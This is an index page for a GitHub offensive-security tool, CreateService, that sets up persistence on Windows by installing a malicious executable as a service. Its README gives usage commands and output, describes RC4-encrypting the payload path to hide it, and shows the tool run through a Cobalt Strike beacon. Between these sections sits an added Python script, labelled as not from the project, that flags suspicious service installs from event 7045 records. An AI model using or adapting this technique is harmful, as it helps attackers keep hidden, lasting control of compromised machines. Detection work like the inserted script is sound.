Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/uknowsec/CreateService
Persistence via service creation
Last synced: 21 days ago
- Host: GitHub
- URL: https://github.com/uknowsec/CreateService
- Owner: uknowsec
- Created: 2020-09-23T05:03:52.000Z (about 4 years ago)
- Default Branch: master
- Last Pushed: 2021-04-26T06:43:12.000Z (over 3 years ago)
- Last Synced: 2024-11-13T08:11:30.717Z (29 days ago)
- Language: C++
- Homepage:
- Size: 436 KB
- Stars: 104
- Watchers: 3
- Forks: 27
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - uknowsec/CreateService - Persistence via service creation (C++)
README
# CreateService
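## File description
- CreateService: main program for creating and deleting the service
- CreateServiceDll: RDI version for creating and deleting the service
- TransitEXE: intermediary program

```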
C:\Users\Administrator\Desktop>CreateService.exe "C:\Users\Administrator\Desktop\TransitEXE.exe" "C:\Users\Administrator\Desktop\test.exe" test start
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\test.exe
[+] Success! Service successfully Create and Start.
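```

The program registers TransitEXE.exe as a service, RC4-encrypts the path `C:\Users\Administrator\Desktop\test.exe` (the key is the current machine's PROCESSOR_REVISION environment variable), and writes it into the resources of `C:\Users\Administrator\Desktop\TransitEXE.exe`.
Once the service has been created, TransitEXE.exe decrypts the path of the malicious exe from its own resources and runs it.
This way only the malicious exe needs to be supplied, with no need to compile service-module code each time.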
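
From the defender's side, the behaviour described above shows up as a newly installed service whose binary sits in a user-writable directory. The following is an added example, not code from the CreateService project: it flags such service-install records, using constructed sample events modelled on Service Control Manager event 7045 and an assumed list of user-writable path prefixes.

```python
import ntpath
import re

# Assumed heuristic: directory prefixes that ordinary users can usually write to.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")


def service_executable(image_path):
    """Extract the executable from a service ImagePath (quoted or unquoted, with args)."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        exe = p[1:end] if end != -1 else p[1:]
    else:
        # Unquoted: take the shortest prefix ending in a binary extension.
        m = re.match(r"(.+?\.(?:exe|dll|sys|bat|cmd|com))(?:\s|$)", p, re.I)
        exe = m.group(1) if m else p.split(" ")[0]
    # normpath collapses ".." segments so traversal cannot hide the real location.
    return ntpath.normpath(exe).lower()


def suspicious_service_installs(events):
    """Return (ServiceName, executable) for 7045 events whose binary is user-writable."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7045:  # 7045 = "A service was installed in the system"
            continue
        exe = service_executable(ev.get("ImagePath", ""))
        if exe.startswith(USER_WRITABLE):
            hits.append((ev["ServiceName"], exe))
    return hits


# Constructed sample records (field names follow event 7045; values are illustrative).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "test",
     "ImagePath": r"C:\Users\Administrator\Desktop\TransitEXE.exe"},
    {"EventID": 7045, "ServiceName": "Updater",
     "ImagePath": r'"C:\Program Files\Vendor\updater.exe" --service'},
    {"EventID": 7045, "ServiceName": "helper",
     "ImagePath": r"C:\Windows\System32\..\..\Users\Public\helper.exe -run"},
    {"EventID": 7036, "ServiceName": "test", "ImagePath": ""},
]

if __name__ == "__main__":
    for name, exe in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"review service {name!r}: binary in user-writable path {exe}")
```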
## Cobalt Strike RDI
```
beacon> CreateService C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test start
[*] Tasked beacon to spawn CreateService ....
[+] arguments are:C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test start
[+] host called home, sent: 103053 bytes
[+] received output:
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\beacon.exe
[+] Success! Service successfully Create and Start.
beacon> CreateService C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test stop
[*] Tasked beacon to spawn CreateService ....
[+] arguments are:C:\Users\Administrator\Desktop\TransitEXE.exe C:\Users\Administrator\Desktop\beacon.exe test stop
[+] host called home, sent: 103052 bytes
[+] received output:
[*] CreateService by Uknow
[+] ServiceName: test
[+] TransitPathName: C:\Users\Administrator\Desktop\TransitEXE.exe
[+] EvilPathName: C:\Users\Administrator\Desktop\beacon.exe
[+] Success! Service successfully Stop and Delete.
```